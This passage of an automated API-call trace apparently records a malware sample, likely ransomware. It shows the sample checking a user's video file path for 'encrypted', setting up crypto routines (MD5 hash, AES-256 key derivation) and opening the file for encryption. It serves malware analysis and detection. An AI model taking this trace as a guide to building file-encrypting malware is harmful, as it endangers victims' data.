lpString1="HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Pmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="z\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ideos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="deos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="os\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ke8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="8ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZL\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.077] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bc6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="c6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="y2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="2qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qC_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="04DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DdnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dnddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ddgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dgHl.mkv\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0042.078] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0042.078] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0042.078] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0042.078] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0042.078] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0042.078] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.078] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.078] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.079] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0042.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.079] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x41b88250, ftCreationTime.dwHighDateTime=0x1d5b669, ftLastAccessTime.dwLowDateTime=0x39f1cbd0, ftLastAccessTime.dwHighDateTime=0x1d5b880, ftLastWriteTime.dwLowDateTime=0x39f1cbd0, ftLastWriteTime.dwHighDateTime=0x1d5b880, nFileSizeHigh=0x0, nFileSizeLow=0x1435f, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="0bc6y2qC_04DdnddgHl.mkv", cAlternateFileName="0BC6Y2~1.MKV")) returned 0x7c2100 [0042.079] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0042.079] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.079] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.079] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.079] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.079] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0042.079] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.079] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0042.079] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.080] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0042.080] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.080] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.080] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.080] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.080] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.080] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0042.080] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.080] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5b30) returned 1 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0042.081] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.081] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.081] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.082] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0042.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.082] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0042.082] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0042.082] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.082] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0042.082] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.082] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.082] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.082] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.082] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.082] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.083] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.083] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.083] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.083] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.083] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.083] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.083] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0042.083] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0042.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.084] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0042.084] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0042.084] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0042.084] CryptDestroyHash (hHash=0x7c2240) returned 1 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889778 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0042.084] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889b08 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0042.084] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.084] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0042.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.085] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b20 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0042.085] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0042.085] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\sKe8ZL\\0bc6y2qC_04DdnddgHl.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ske8zl\\0bc6y2qc_04ddnddghl.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0042.085] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0042.085] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, 